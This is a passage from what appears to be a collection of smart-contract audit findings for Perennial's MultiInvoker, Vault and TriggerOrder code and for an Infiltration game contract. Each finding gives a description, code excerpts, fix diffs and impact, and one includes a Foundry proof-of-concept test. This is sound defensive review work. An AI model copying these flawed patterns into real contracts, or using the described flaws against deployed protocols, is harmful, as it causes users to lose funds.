UFixed6Lib.ZERO : currentPosition.short.sub(closable),\\n@@@ Fixed6Lib.from(-1, liquidationFee),\\n true\\n```\\n\\nThis means liquidator will receive 0 fee for the liquidation.\\nIt is also used in canExecuteOrder:\\n```\\n function _executeOrder(address account, IMarket market, uint256 nonce) internal {\\n if (!canExecuteOrder(account, market, nonce)) revert MultiInvokerCantExecuteError();\\n// rest of code\\n function canExecuteOrder(address account, IMarket market, uint256 nonce) public view returns (bool) {\\n TriggerOrder memory order = orders(account, market, nonce);\\n if (order.fee.isZero()) return false;\\n@@@ (, Fixed6 latestPrice, ) = _latest(market, account);\\n@@@ return order.fillable(latestPrice);\\n }\\n```\\n\\nMeaning `canExecuteOrder` will do comparision with price = 0 instead of real latest price. For example: limit buy order to buy when price <= 1000 (when current price = 1100) will trigger and execute buy at the price = 1100 instead of 1000 or lower.
`_latest` should replicate the process for the latest price from `Market` instead of using price from the oracle's latest version:\\nif the latest oracle version is valid, then use its price\\nif the latest oracle version is invalid, then iterate all global pending positions backwards and use price of any valid oracle version at the position.\\nif all pending positions are at invalid oracles, use market's `global.latestPrice`
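The recommended fallback can be sketched as follows (a hypothetical Python model; in the real implementation the pending entries would be oracle versions read at pending position timestamps):

```python
def latest_price(latest_version, pending_versions, global_latest_price):
    """Pick a usable price for _latest.

    latest_version / pending_versions entries: (price, valid) tuples,
    pending_versions ordered oldest -> newest.
    """
    price, valid = latest_version
    if valid:
        return price  # case 1: latest oracle version is valid
    # case 2: walk pending positions backwards, use any valid version's price
    for price, valid in reversed(pending_versions):
        if valid:
            return price
    # case 3: every pending oracle version is invalid -> global.latestPrice
    return global_latest_price

# Latest version invalid (price 0), but an older pending version was valid:
print(latest_price((0, False), [(1000, True), (0, False)], 950))  # -> 1000
```

This mirrors how `Market` itself avoids a zero price, so liquidation fees and trigger-order comparisons in `MultiInvoker` would use a real price instead of 0.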
liquidation done after an invalid oracle version via the `MultiInvoker` `LIQUIDATE` action will charge 0 liquidation fee from the liquidated account and send 0 to the liquidator, so the liquidator loses the fee funds they should have earned.\\nsome orders with comparison of type -1 (<= price) will incorrectly trigger and be executed when the real price is far from the trigger price. This loses user funds due to the unexpected execution price of the pending order.
```\\nOracleVersion memory latestOracleVersion = market.oracle().latest();\\nlatestPrice = latestOracleVersion.price;\\nIPayoffProvider payoff = market.payoff();\\nif (address(payoff) != address(0)) latestPrice = payoff.payoff(latestPrice);\\n```\\n
`MultiInvoker._latest` calculates incorrect closable for the current oracle version causing some liquidations to revert
medium
`closable` is the value calculated as the maximum possible position size that can be closed even if some pending position updates are invalidated due to invalid oracle version. There is one tricky edge case at the current oracle version which is calculated incorrectly in `MultiInvoker` (and also in Vault). This happens when pending position is updated in the current active oracle version: it is allowed to set this current position to any value conforming to `closable` of the previous pending (or latest) position. For example:\\nlatest settled position = 10\\nuser calls update(20) - pending position at t=200 is set to 20. If we calculate `closable` normally, it will be 10 (latest settled position).\\nuser calls update(0) - pending position at t=200 is set to 0. This is valid and correct. It looks as if we've reduced position by 20, bypassing the `closable` = 10 value, but in reality the only enforced `closable` is the previous one (for latest settled position in the example, so it's 10) and it's enforced as a change from previous position, not from current.\\nNow, if the step 3 happened in the next oracle version, so 3. user calls update(0) - pending position at t=300 will revert, because user can't close more than 10, and he tries to close 20.\\nSo in such tricky edge case, `MultiInvoker` (and Vault) will calculate `closable = 10` and will try to liquidate with position = 20-10 = 10 instead of 0 and will revert, because `Market._invariant` will calculate `closable = 10` (latest = 10, pending = 10, closable = latest = 10), but it must be 0 to liquidate (step 3. 
in the example above)\\nIn `Vault` case, this is less severe as the market will simply allow to redeem and will close smaller amount than it actually can.\\nWhen `Market` calculates `closable`, it's calculated starting from latest settled position up to (but not including) current position:\\n```\\n// load pending positions\\nfor (uint256 id = context.local.latestId + 1; id < context.local.currentId; id++)\\n _processPendingPosition(context, _loadPendingPositionLocal(context, account, id));\\n```\\n\\nPay attention to `id < context.local.currentId` - the loop doesn't include currentId.\\nAfter the current position is updated to a new user specified value, only then the current position is processed and closable now includes new user position change from the previous position:\\n```\\nfunction _update(\\n // rest of code\\n // load\\n _loadUpdateContext(context, account);\\n // rest of code\\n context.currentPosition.local.update(collateral);\\n // rest of code\\n // process current position\\n _processPendingPosition(context, context.currentPosition.local);\\n // rest of code\\n // after\\n _invariant(context, account, newOrder, collateral, protected);\\n```\\n\\nThe `MultiInvoker._latest` logic is different and simply includes calculation of `closable` for all pending positions:\\n```\\nfor (uint256 id = local.latestId + 1; id <= local.currentId; id++) {\\n\\n // load pending position\\n Position memory pendingPosition = market.pendingPositions(account, id);\\n pendingPosition.adjust(latestPosition);\\n\\n // virtual settlement\\n if (pendingPosition.timestamp <= latestTimestamp) {\\n if (!market.oracle().at(pendingPosition.timestamp).valid) latestPosition.invalidate(pendingPosition);\\n latestPosition.update(pendingPosition);\\n\\n previousMagnitude = latestPosition.magnitude();\\n closableAmount = previousMagnitude;\\n\\n // process pending positions\\n } else {\\n closableAmount = closableAmount\\n 
.sub(previousMagnitude.sub(pendingPosition.magnitude().min(previousMagnitude)));\\n previousMagnitude = latestPosition.magnitude();\\n }\\n}\\n```\\n\\nThe same incorrect logic is in a Vault:\\n```\\n// pending positions\\nfor (uint256 id = marketContext.local.latestId + 1; id <= marketContext.local.currentId; id++)\\n previousClosable = _loadPosition(\\n marketContext,\\n marketContext.currentAccountPosition = registration.market.pendingPositions(address(this), id),\\n previousClosable\\n );\\n```\\n
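The edge case above is easy to reproduce with plain arithmetic. Below is a minimal Python sketch (not the protocol's Solidity; function names and the `last_is_current_version` flag are hypothetical) contrasting the current `MultiInvoker`/`Vault` bookkeeping with the suggested fix:

```python
def closable_invoker(latest, pending):
    """Current MultiInvoker/Vault logic: only position decreases are
    subtracted, over ALL pending positions including currentId."""
    closable, prev = latest, latest
    for p in pending:
        closable -= prev - min(p, prev)
        prev = p
    return closable

def closable_fixed(latest, pending, last_is_current_version):
    """Suggested fix: if the pending position at currentId shares the
    current oracle version, credit its full (signed) change instead."""
    closable, prev = latest, latest
    for p in pending[:-1]:
        closable -= prev - min(p, prev)
        prev = p
    last = pending[-1]
    if last_is_current_version:
        closable += last - prev   # signed delta at currentId
    else:
        closable -= prev - min(last, prev)
    return closable

# latest settled = 10, user updated to 20 in the current oracle version:
print(closable_invoker(10, [20]))                              # 10
print(closable_fixed(10, [20], last_is_current_version=True))  # 20
```

With the fix, `update(0)` at the same version yields `closable = 10 + (0 - 10) = 0`, matching what `Market` itself enforces.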
When calculating `closable` in `MultiInvoker` and `Vault`, add the following logic:\\nif the timestamp of the pending position at index currentId equals the current oracle version, then add the difference between the position size at currentId and the previous position size to `closable` (both when that position increases and when it decreases).\\nFor example, if\\nlatest settled position = `10`\\npending position at t=200 = `20`\\nthen initialize `closable` to `10` (latest) and add (pending - latest) = (20 - 10) to `closable`, giving `closable = 20`.
In the following edge case:\\ncurrent oracle version = oracle version of the pending position in currentId index\\nAND this (current) pending position increases compared to previous pending/settled position\\nThe following can happen:\\nliquidation via `MultiInvoker` will revert (medium impact)\\nvault's `maxRedeem` amount will be smaller than actual allowed amount, position will be reduced by a smaller amount than they actually can (low impact)
```\\n// load pending positions\\nfor (uint256 id = context.local.latestId + 1; id < context.local.currentId; id++)\\n _processPendingPosition(context, _loadPendingPositionLocal(context, account, id));\\n```\\n
MultiInvoker closableAmount calculation logic is wrong
medium
In `MultiInvoker._latest()`, the incorrect use of `previousMagnitude = latestPosition.magnitude()` leads to an error in the calculation of `closableAmount`. This causes errors in the checks that use this variable, such as `_liquidationFee()`.\\nThere are currently multiple places where the user's `closable` needs to be calculated, such as `market.update()`. In `Market.sol`, the calculation is as follows:\\n```\\n    function _processPendingPosition(Context memory context, Position memory newPendingPosition) private {\\n        context.pendingCollateral = context.pendingCollateral\\n            .sub(newPendingPosition.fee)\\n            .sub(Fixed6Lib.from(newPendingPosition.keeper));\\n        \\n        context.closable = context.closable\\n            .sub(context.previousPendingMagnitude\\n                .sub(newPendingPosition.magnitude().min(context.previousPendingMagnitude)));\\n        context.previousPendingMagnitude = newPendingPosition.magnitude();\\n\\n        if (context.previousPendingMagnitude.gt(context.maxPendingMagnitude))\\n            context.maxPendingMagnitude = newPendingPosition.magnitude();\\n    }\\n```\\n\\nIt loops through each `pendingPosition`, and each iteration sets `context.previousPendingMagnitude = newPendingPosition.magnitude();` to be used as the basis for the calculation of the next `pendingPosition`.\\n`closableAmount` is also calculated in `MultiInvoker._latest()`. 
The current implementation is as follows:\\n```\\n function _latest(\\n IMarket market,\\n address account\\n ) internal view returns (Position memory latestPosition, Fixed6 latestPrice, UFixed6 closableAmount) {\\n // load latest price\\n OracleVersion memory latestOracleVersion = market.oracle().latest();\\n latestPrice = latestOracleVersion.price;\\n IPayoffProvider payoff = market.payoff();\\n if (address(payoff) != address(0)) latestPrice = payoff.payoff(latestPrice);\\n\\n // load latest settled position\\n uint256 latestTimestamp = latestOracleVersion.timestamp;\\n latestPosition = market.positions(account);\\n closableAmount = latestPosition.magnitude();\\n UFixed6 previousMagnitude = closableAmount;\\n\\n // scan pending position for any ready-to-be-settled positions\\n Local memory local = market.locals(account);\\n for (uint256 id = local.latestId + 1; id <= local.currentId; id++) {\\n\\n // load pending position\\n Position memory pendingPosition = market.pendingPositions(account, id);\\n pendingPosition.adjust(latestPosition);\\n\\n // virtual settlement\\n if (pendingPosition.timestamp <= latestTimestamp) {\\n if (!market.oracle().at(pendingPosition.timestamp).valid) latestPosition.invalidate(pendingPosition);\\n latestPosition.update(pendingPosition);\\n\\n previousMagnitude = latestPosition.magnitude();\\n closableAmount = previousMagnitude;\\n\\n // process pending positions\\n } else {\\n closableAmount = closableAmount\\n .sub(previousMagnitude.sub(pendingPosition.magnitude().min(previousMagnitude)));\\n previousMagnitude = latestPosition.magnitude();\\n }\\n }\\n }\\n```\\n\\nThis method also loops through `pendingPosition`, but incorrectly uses `latestPosition.magnitude()` to set `previousMagnitude`, `previousMagnitude` = latestPosition.magnitude();. The correct way should be `previousMagnitude = currentPendingPosition.magnitude()` like `market.sol`. This mistake leads to an incorrect calculation of `closableAmount`.
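The effect of the wrong `previousMagnitude` update can be shown with a few lines of integer arithmetic. A hypothetical Python sketch (plain integers instead of `UFixed6`) contrasting the buggy and corrected loops:

```python
def closable_buggy(latest, pending):
    """Mirrors MultiInvoker._latest: prev is reset to the LATEST settled
    magnitude on every iteration (the reported bug)."""
    closable, prev = latest, latest
    for p in pending:
        closable -= prev - min(p, prev)
        prev = latest            # bug: should advance to the pending magnitude
    return closable

def closable_correct(latest, pending):
    """Market-style: prev advances to the last processed pending magnitude."""
    closable, prev = latest, latest
    for p in pending:
        closable -= prev - min(p, prev)
        prev = p
    return closable

# latest settled = 10 with two pending positions 5 then 8:
print(closable_correct(10, [5, 8]))  # 5
print(closable_buggy(10, [5, 8]))    # 3 (under-counts closable)
```

With `pending = [5, 3]` the buggy version even goes negative (which would revert in `UFixed6` arithmetic), while the correct value is 3.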
```\\n function _latest(\\n IMarket market,\\n address account\\n ) internal view returns (Position memory latestPosition, Fixed6 latestPrice, UFixed6 closableAmount) {\\n // load latest price\\n OracleVersion memory latestOracleVersion = market.oracle().latest();\\n latestPrice = latestOracleVersion.price;\\n IPayoffProvider payoff = market.payoff();\\n if (address(payoff) != address(0)) latestPrice = payoff.payoff(latestPrice);\\n\\n // load latest settled position\\n uint256 latestTimestamp = latestOracleVersion.timestamp;\\n latestPosition = market.positions(account);\\n closableAmount = latestPosition.magnitude();\\n UFixed6 previousMagnitude = closableAmount;\\n\\n // scan pending position for any ready// Remove the line below\\nto// Remove the line below\\nbe// Remove the line below\\nsettled positions\\n Local memory local = market.locals(account);\\n for (uint256 id = local.latestId // Add the line below\\n 1; id <= local.currentId; id// Add the line below\\n// Add the line below\\n) {\\n\\n // load pending position\\n Position memory pendingPosition = market.pendingPositions(account, id);\\n pendingPosition.adjust(latestPosition);\\n\\n // virtual settlement\\n if (pendingPosition.timestamp <= latestTimestamp) {\\n if (!market.oracle().at(pendingPosition.timestamp).valid) latestPosition.invalidate(pendingPosition);\\n latestPosition.update(pendingPosition);\\n\\n previousMagnitude = latestPosition.magnitude();\\n closableAmount = previousMagnitude;\\n\\n // process pending positions\\n } else {\\n closableAmount = closableAmount\\n .sub(previousMagnitude.sub(pendingPosition.magnitude().min(previousMagnitude)));\\n// Remove the line below\\n previousMagnitude = latestPosition.magnitude();\\n// Add the line below\\n previousMagnitude = pendingPosition.magnitude();\\n }\\n }\\n }\\n```\\n
The calculation of `closableAmount` is incorrect, which leads to errors in the judgments that use this variable, such as `_liquidationFee()`.
```\\n function _processPendingPosition(Context memory context, Position memory newPendingPosition) private {\\n context.pendingCollateral = context.pendingCollateral\\n .sub(newPendingPosition.fee)\\n .sub(Fixed6Lib.from(newPendingPosition.keeper));\\n \\n context.closable = context.closable\\n .sub(context.previousPendingMagnitude\\n .sub(newPendingPosition.magnitude().min(context.previousPendingMagnitude)));\\n context.previousPendingMagnitude = newPendingPosition.magnitude();\\n\\n if (context.previousPendingMagnitude.gt(context.maxPendingMagnitude))\\n context.maxPendingMagnitude = newPendingPosition.magnitude();\\n }\\n```\\n
interfaceFee incorrectly converted to uint40 when stored
medium
The `interfaceFee.amount` is currently defined as `uint48` , with a maximum value of approximately `281m`. However, it is incorrectly converted to `uint40` when saved, `uint40(UFixed6.unwrap(newValue.interfaceFee.amount))`, which means the maximum value can only be approximately `1.1M`. If a user sets an order where `interfaceFee.amount` is greater than `1.1M`, the order can be saved successfully but the actual stored value may be truncated to `0`. This is not what the user expects, and the user may think that the order has been set, but in reality, it is an incorrect order. Although a fee of `1.1M` is large, it is not impossible.\\n`interfaceFee.amount` is defined as `uint48` the legality check also uses `type(uint48).max`, but `uint40` is used when saving.\\n```\\nstruct StoredTriggerOrder {\\n /* slot 0 */\\n uint8 side; // 0 = maker, 1 = long, 2 = short, 3 = collateral\\n int8 comparison; // -2 = lt, -1 = lte, 0 = eq, 1 = gte, 2 = gt\\n uint64 fee; // <= 18.44tb\\n int64 price; // <= 9.22t\\n int64 delta; // <= 9.22t\\n uint48 interfaceFeeAmount; // <= 281m\\n\\n /* slot 1 */\\n address interfaceFeeReceiver;\\n bool interfaceFeeUnwrap;\\n bytes11 __unallocated0__;\\n}\\n\\nlibrary TriggerOrderLib {\\n function store(TriggerOrderStorage storage self, TriggerOrder memory newValue) internal {\\n if (newValue.side > type(uint8).max) revert TriggerOrderStorageInvalidError();\\n if (newValue.comparison > type(int8).max) revert TriggerOrderStorageInvalidError();\\n if (newValue.comparison < type(int8).min) revert TriggerOrderStorageInvalidError();\\n if (newValue.fee.gt(UFixed6.wrap(type(uint64).max))) revert TriggerOrderStorageInvalidError();\\n if (newValue.price.gt(Fixed6.wrap(type(int64).max))) revert TriggerOrderStorageInvalidError();\\n if (newValue.price.lt(Fixed6.wrap(type(int64).min))) revert TriggerOrderStorageInvalidError();\\n if (newValue.delta.gt(Fixed6.wrap(type(int64).max))) revert TriggerOrderStorageInvalidError();\\n if 
(newValue.delta.lt(Fixed6.wrap(type(int64).min))) revert TriggerOrderStorageInvalidError();\\n if (newValue.interfaceFee.amount.gt(UFixed6.wrap(type(uint48).max))) revert TriggerOrderStorageInvalidError();\\n\\n self.value = StoredTriggerOrder(\\n uint8(newValue.side),\\n int8(newValue.comparison),\\n uint64(UFixed6.unwrap(newValue.fee)),\\n int64(Fixed6.unwrap(newValue.price)),\\n int64(Fixed6.unwrap(newValue.delta)),\\n uint40(UFixed6.unwrap(newValue.interfaceFee.amount)),\\n newValue.interfaceFee.receiver,\\n newValue.interfaceFee.unwrap,\\n bytes11(0)\\n );\\n }\\n```\\n\\nWe can see that when saving, it is forcibly converted to `uint40`, as in `uint40(UFixed6.unwrap(newValue.interfaceFee.amount))`. The order can be saved successfully, but the actual storage may be truncated to `0`.
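The silent wrap is easy to quantify. A back-of-the-envelope Python sketch, assuming 6-decimal `UFixed6` amounts (the cast to `uint40` wraps modulo `2**40`; the function name is hypothetical):

```python
UFIXED6 = 10 ** 6

def store_interface_fee_amount(amount):
    # mirrors uint40(UFixed6.unwrap(newValue.interfaceFee.amount))
    return amount % 2 ** 40

fee = 1_200_000 * UFIXED6            # 1.2M tokens: passes the uint48 check
assert fee <= 2 ** 48 - 1            # validation succeeds
stored = store_interface_fee_amount(fee)
print(stored / UFIXED6)              # ~100488.37 instead of 1200000.0
```

So the order saves successfully, but the fee actually stored is a wrapped value far below what the user set.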
```\\nlibrary TriggerOrderLib {\\n function store(TriggerOrderStorage storage self, TriggerOrder memory newValue) internal {\\n if (newValue.side > type(uint8).max) revert TriggerOrderStorageInvalidError();\\n if (newValue.comparison > type(int8).max) revert TriggerOrderStorageInvalidError();\\n if (newValue.comparison < type(int8).min) revert TriggerOrderStorageInvalidError();\\n if (newValue.fee.gt(UFixed6.wrap(type(uint64).max))) revert TriggerOrderStorageInvalidError();\\n if (newValue.price.gt(Fixed6.wrap(type(int64).max))) revert TriggerOrderStorageInvalidError();\\n if (newValue.price.lt(Fixed6.wrap(type(int64).min))) revert TriggerOrderStorageInvalidError();\\n if (newValue.delta.gt(Fixed6.wrap(type(int64).max))) revert TriggerOrderStorageInvalidError();\\n if (newValue.delta.lt(Fixed6.wrap(type(int64).min))) revert TriggerOrderStorageInvalidError();\\n if (newValue.interfaceFee.amount.gt(UFixed6.wrap(type(uint48).max))) revert TriggerOrderStorageInvalidError();\\n\\n self.value = StoredTriggerOrder(\\n uint8(newValue.side),\\n int8(newValue.comparison),\\n uint64(UFixed6.unwrap(newValue.fee)),\\n int64(Fixed6.unwrap(newValue.price)),\\n int64(Fixed6.unwrap(newValue.delta)),\\n// Remove the line below\\n uint40(UFixed6.unwrap(newValue.interfaceFee.amount)),\\n// Add the line below\\n uint48(UFixed6.unwrap(newValue.interfaceFee.amount)),\\n newValue.interfaceFee.receiver,\\n newValue.interfaceFee.unwrap,\\n bytes11(0)\\n );\\n }\\n```\\n
For orders where `interfaceFee.amount` is greater than `1.1M`, the order can be saved successfully, but the actual storage may be truncated to `0`. This is not what users expect and may lead to incorrect fee payments when the order is executed. Although a fee of `1.1M` is large, it is not impossible.
```\\nstruct StoredTriggerOrder {\\n /* slot 0 */\\n uint8 side; // 0 = maker, 1 = long, 2 = short, 3 = collateral\\n int8 comparison; // -2 = lt, -1 = lte, 0 = eq, 1 = gte, 2 = gt\\n uint64 fee; // <= 18.44tb\\n int64 price; // <= 9.22t\\n int64 delta; // <= 9.22t\\n uint48 interfaceFeeAmount; // <= 281m\\n\\n /* slot 1 */\\n address interfaceFeeReceiver;\\n bool interfaceFeeUnwrap;\\n bytes11 __unallocated0__;\\n}\\n\\nlibrary TriggerOrderLib {\\n function store(TriggerOrderStorage storage self, TriggerOrder memory newValue) internal {\\n if (newValue.side > type(uint8).max) revert TriggerOrderStorageInvalidError();\\n if (newValue.comparison > type(int8).max) revert TriggerOrderStorageInvalidError();\\n if (newValue.comparison < type(int8).min) revert TriggerOrderStorageInvalidError();\\n if (newValue.fee.gt(UFixed6.wrap(type(uint64).max))) revert TriggerOrderStorageInvalidError();\\n if (newValue.price.gt(Fixed6.wrap(type(int64).max))) revert TriggerOrderStorageInvalidError();\\n if (newValue.price.lt(Fixed6.wrap(type(int64).min))) revert TriggerOrderStorageInvalidError();\\n if (newValue.delta.gt(Fixed6.wrap(type(int64).max))) revert TriggerOrderStorageInvalidError();\\n if (newValue.delta.lt(Fixed6.wrap(type(int64).min))) revert TriggerOrderStorageInvalidError();\\n if (newValue.interfaceFee.amount.gt(UFixed6.wrap(type(uint48).max))) revert TriggerOrderStorageInvalidError();\\n\\n self.value = StoredTriggerOrder(\\n uint8(newValue.side),\\n int8(newValue.comparison),\\n uint64(UFixed6.unwrap(newValue.fee)),\\n int64(Fixed6.unwrap(newValue.price)),\\n int64(Fixed6.unwrap(newValue.delta)),\\n uint40(UFixed6.unwrap(newValue.interfaceFee.amount)),\\n newValue.interfaceFee.receiver,\\n newValue.interfaceFee.unwrap,\\n bytes11(0)\\n );\\n }\\n```\\n
vault.claimReward(): if there is a market without a reward token, it may cause all markets to be unable to retrieve rewards
medium
`vault.claimReward()` loops through every `market` of the `vault`, executes `claimReward()`, and transfers the `rewards` to `factory().owner()`. If one of the markets does not have `rewards`, that is, its `rewardToken` is not set (`Token18 reward = address(0)`), the loop currently lacks a `reward != address(0)` check: it will still execute `market.claimReward()`, and the entire method will `revert`. This leaves the other markets that do have `rewards` unable to retrieve them.\\nThe current implementation of `vault.claimReward()` is as follows:\\n```\\n    function claimReward() external onlyOwner {\\n        for (uint256 marketId; marketId < totalMarkets; marketId++) {\\n            _registrations[marketId].read().market.claimReward();\\n            _registrations[marketId].read().market.reward().push(factory().owner());\\n        }\\n    }\\n```\\n\\nWe can see that the method loops through all the markets and executes `market.claimReward()` and `reward().push()`.\\nThe problem is that not every market has a `rewards` token: `Market.sol` does not force `rewards` to be set in `initialize()`. 
The market's `makerRewardRate.makerRewardRate` is also allowed to be 0.\\n```\\ncontract Market is IMarket, Instance, ReentrancyGuard {\\n /// @dev The token that incentive rewards are paid in\\n Token18 public reward;\\n\\n function initialize(IMarket.MarketDefinition calldata definition_) external initializer(1) {\\n __Instance__initialize();\\n __ReentrancyGuard__initialize();\\n\\n token = definition_.token;\\n oracle = definition_.oracle;\\n payoff = definition_.payoff;\\n }\\n// rest of code\\n\\n\\nlibrary MarketParameterStorageLib {\\n// rest of code\\n function validate(\\n MarketParameter memory self,\\n ProtocolParameter memory protocolParameter,\\n Token18 reward\\n ) public pure {\\n if (self.settlementFee.gt(protocolParameter.maxFeeAbsolute)) revert MarketParameterStorageInvalidError();\\n\\n if (self.fundingFee.max(self.interestFee).max(self.positionFee).gt(protocolParameter.maxCut))\\n revert MarketParameterStorageInvalidError();\\n\\n if (self.oracleFee.add(self.riskFee).gt(UFixed6Lib.ONE)) revert MarketParameterStorageInvalidError();\\n\\n if (\\n reward.isZero() &&\\n (!self.makerRewardRate.isZero() || !self.longRewardRate.isZero() || !self.shortRewardRate.isZero())\\n ) revert MarketParameterStorageInvalidError();\\n```\\n\\nThis means that `market.sol` can be without `rewards token`.\\nIf there is such a market, the current `vault.claimReward()` will `revert`, causing other markets with `rewards` to also be unable to retrieve `rewards`.
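A minimal sketch of the failure mode, assuming a claim on a market whose reward token is unset reverts (modelled here by raising; the class and function names are hypothetical):

```python
class Market:
    def __init__(self, reward):
        self.reward = reward                 # None models Token18 address(0)

    def claim_reward(self):
        if self.reward is None:
            raise RuntimeError("no reward token configured")
        return self.reward

def claim_all(markets):
    claimed = []
    for m in markets:
        if m.reward is None:                 # suggested guard: skip rewardless markets
            continue
        claimed.append(m.claim_reward())
    return claimed

# without the guard, the middle market would abort the whole call
print(claim_all([Market("LOOKS"), Market(None), Market("OP")]))
```

With the guard in place the rewardless market is simply skipped, and the remaining markets still receive their rewards.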
```\\n function claimReward() external onlyOwner {\\n for (uint256 marketId; marketId < totalMarkets; marketId// Add the line below\\n// Add the line below\\n) {\\n// Add the line below\\n if (_registrations[marketId].read().market.reward().isZero()) continue;\\n _registrations[marketId].read().market.claimReward();\\n _registrations[marketId].read().market.reward().push(factory().owner());\\n }\\n }\\n```\\n
If the `vault` contains markets without `rewards`, it will cause other markets with `rewards` to also be unable to retrieve `rewards`.
```\\n function claimReward() external onlyOwner {\\n for (uint256 marketId; marketId < totalMarkets; marketId++) {\\n _registrations[marketId].read().market.claimReward();\\n _registrations[marketId].read().market.reward().push(factory().owner());\\n }\\n }\\n```\\n
_killWoundedAgents
high
The `_killWoundedAgents` function only checks the status of the agent, not when it was wounded.\\n```\\n    function _killWoundedAgents(\\n        uint256 roundId,\\n        uint256 currentRoundAgentsAlive\\n    ) private returns (uint256 deadAgentsCount) {\\n        // rest of code\\n            for (uint256 i; i < woundedAgentIdsCount; ) {\\n                uint256 woundedAgentId = woundedAgentIdsInRound[i.unsafeAdd(1)];\\n\\n                uint256 index = agentIndex(woundedAgentId);\\n                if (agents[index].status == AgentStatus.Wounded) {\\n                    // rest of code\\n                }\\n\\n                // rest of code\\n            }\\n\\n            emit Killed(roundId, woundedAgentIds);\\n    }\\n```\\n\\nSo when `fulfillRandomWords` kills agents that were wounded and unhealed at round `currentRoundId - ROUNDS_TO_BE_WOUNDED_BEFORE_DEAD`, it will also kill an agent who was healed and then wounded again after that round.\\nAlso, since `fulfillRandomWords` first draws the new wounded agents before killing agents, in the worst-case scenario an agent could die immediately after being wounded in this round.\\n```\\nif (activeAgents > NUMBER_OF_SECONDARY_PRIZE_POOL_WINNERS) {\\n    uint256 woundedAgents = _woundRequestFulfilled(\\n        currentRoundId,\\n        currentRoundAgentsAlive,\\n        activeAgents,\\n        currentRandomWord\\n    );\\n\\n    uint256 deadAgentsFromKilling;\\n    if (currentRoundId > ROUNDS_TO_BE_WOUNDED_BEFORE_DEAD) {\\n        deadAgentsFromKilling = _killWoundedAgents({\\n            roundId: currentRoundId.unsafeSubtract(ROUNDS_TO_BE_WOUNDED_BEFORE_DEAD),\\n            currentRoundAgentsAlive: currentRoundAgentsAlive\\n        });\\n    }\\n```\\n\\nThis is the PoC test code. You can add it to the Infiltration.fulfillRandomWords.t.sol file and run it.\\n```\\nfunction test_poc() public {\\n\\n    _startGameAndDrawOneRound();\\n\\n    uint256[] memory randomWords = _randomWords();\\n    uint256[] memory woundedAgentIds;\\n\\n    for (uint256 roundId = 2; roundId <= ROUNDS_TO_BE_WOUNDED_BEFORE_DEAD + 1; roundId++) {\\n\\n        if(roundId == 2) { // heal agent. 
only woundedAgentIds[0] dead.\\n (woundedAgentIds, ) = infiltration.getRoundInfo({roundId: 1});\\n assertEq(woundedAgentIds.length, 20);\\n\\n _drawXRounds(1);\\n\\n _heal({roundId: 3, woundedAgentIds: woundedAgentIds});\\n\\n _startNewRound();\\n\\n // everyone except woundedAgentIds[0] is healed\\n uint256 agentIdThatWasKilled = woundedAgentIds[0];\\n\\n IInfiltration.HealResult[] memory healResults = new IInfiltration.HealResult[](20);\\n for (uint256 i; i < 20; i++) {\\n healResults[i].agentId = woundedAgentIds[i];\\n\\n if (woundedAgentIds[i] == agentIdThatWasKilled) {\\n healResults[i].outcome = IInfiltration.HealOutcome.Killed;\\n } else {\\n healResults[i].outcome = IInfiltration.HealOutcome.Healed;\\n }\\n }\\n\\n expectEmitCheckAll();\\n emit HealRequestFulfilled(3, healResults);\\n\\n expectEmitCheckAll();\\n emit RoundStarted(4);\\n\\n randomWords[0] = (69 * 10_000_000_000) + 9_900_000_000; // survival rate 99%, first one gets killed\\n\\n vm.prank(VRF_COORDINATOR);\\n VRFConsumerBaseV2(address(infiltration)).rawFulfillRandomWords(_computeVrfRequestId(3), randomWords);\\n\\n for (uint256 i; i < woundedAgentIds.length; i++) {\\n if (woundedAgentIds[i] != agentIdThatWasKilled) {\\n _assertHealedAgent(woundedAgentIds[i]);\\n }\\n }\\n\\n roundId += 2; // round 2, 3 used for healing\\n }\\n\\n _startNewRound();\\n\\n // Just so that each round has different random words\\n randomWords[0] += roundId;\\n\\n if (roundId == ROUNDS_TO_BE_WOUNDED_BEFORE_DEAD + 1) { // wounded agents at round 1 are healed, only woundedAgentIds[0] was dead.\\n (uint256[] memory woundedAgentIdsFromRound, ) = infiltration.getRoundInfo({\\n roundId: uint40(roundId - ROUNDS_TO_BE_WOUNDED_BEFORE_DEAD)\\n });\\n\\n // find re-wounded agent after healed\\n uint256[] memory woundedAfterHeal = new uint256[](woundedAgentIds.length);\\n uint256 totalWoundedAfterHeal;\\n for (uint256 i; i < woundedAgentIds.length; i ++){\\n uint256 index = infiltration.agentIndex(woundedAgentIds[i]);\\n 
IInfiltration.Agent memory agent = infiltration.getAgent(index);\\n if (agent.status == IInfiltration.AgentStatus.Wounded) {\\n woundedAfterHeal[i] = woundedAgentIds[i]; // re-wounded agent will be killed\\n totalWoundedAfterHeal++;\\n }\\n else{\\n woundedAfterHeal[i] = 0; // set not wounded again 0\\n }\\n\\n }\\n expectEmitCheckAll();\\n emit Killed(roundId - ROUNDS_TO_BE_WOUNDED_BEFORE_DEAD, woundedAfterHeal);\\n }\\n\\n expectEmitCheckAll();\\n emit RoundStarted(roundId + 1);\\n\\n uint256 requestId = _computeVrfRequestId(uint64(roundId));\\n vm.prank(VRF_COORDINATOR);\\n VRFConsumerBaseV2(address(infiltration)).rawFulfillRandomWords(requestId, randomWords);\\n }\\n}\\n```\\n
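The root cause can be condensed into a small simulation. A hypothetical Python sketch, assuming each agent records the round it was wounded in (`woundedAt`), as the recommendation suggests:

```python
import copy

def kill_wounded(agents, wounded_ids_in_round, round_id, check_round):
    """Kills agents from round_id's wounded list. With check_round=True this
    mirrors the suggested fix (status AND woundedAt must both match)."""
    killed = []
    for agent_id in wounded_ids_in_round:
        a = agents[agent_id]
        if a["status"] == "Wounded" and (not check_round or a["woundedAt"] == round_id):
            a["status"] = "Dead"
            killed.append(agent_id)
    return killed

# Agent 1 was wounded in round 1 and never healed; agent 2 was also wounded
# in round 1, healed, then re-wounded in round 5.
agents = {1: {"status": "Wounded", "woundedAt": 1},
          2: {"status": "Wounded", "woundedAt": 5}}

print(kill_wounded(copy.deepcopy(agents), [1, 2], 1, check_round=False))  # [1, 2]
print(kill_wounded(copy.deepcopy(agents), [1, 2], 1, check_round=True))   # [1]
```

The status-only check kills both agents; checking `woundedAt` spares the agent who paid to heal and was only recently re-wounded.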
